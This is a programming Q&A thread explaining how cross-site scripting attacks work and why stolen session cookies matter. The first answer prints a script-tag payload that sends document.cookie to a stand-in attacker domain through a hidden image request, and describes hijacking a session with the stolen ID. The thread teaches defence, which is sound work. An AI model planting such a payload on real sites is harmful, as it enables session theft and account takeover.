How XSS attack really works?

Question

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.
But if developer forgot to use it, what can attacker/hacker do? He can get your session_id, right? And here is a question. What can he do with that?
Thank you very much.

Answer 1

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.

Right. Use it anywhere when you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

But if developer forgot to use it, what can attacker/hacker do?

S/he can insert some malicious HTML/script. E.g. the following in some message/comment at a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

The above will request an image from the mailicious domain along with the document cookie as query string.

He can get your session_id, right? And here is a question. What can he do with that?

The session ID is stored in a cookie. Once the hacker is notified about that an image has been requested with the cookie in query string, all s/he has to do is just to edit the browser's cookie to include the same session ID to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.

Answer 2

Attacker A gets member B to access site C with B's credentials via A's carefully constructed URI.

A can then run any JS they like on C using B's credentials.

This allows them to:

• Present any information they like to B as if it came from C
• Get B's browser to send any information they want from C to A
  • Account details
  • Private information
• Send any instruction to site C as if it came from A
  • Publish this spam
  • Transfer money to this account
  • Buy this very expensive eBook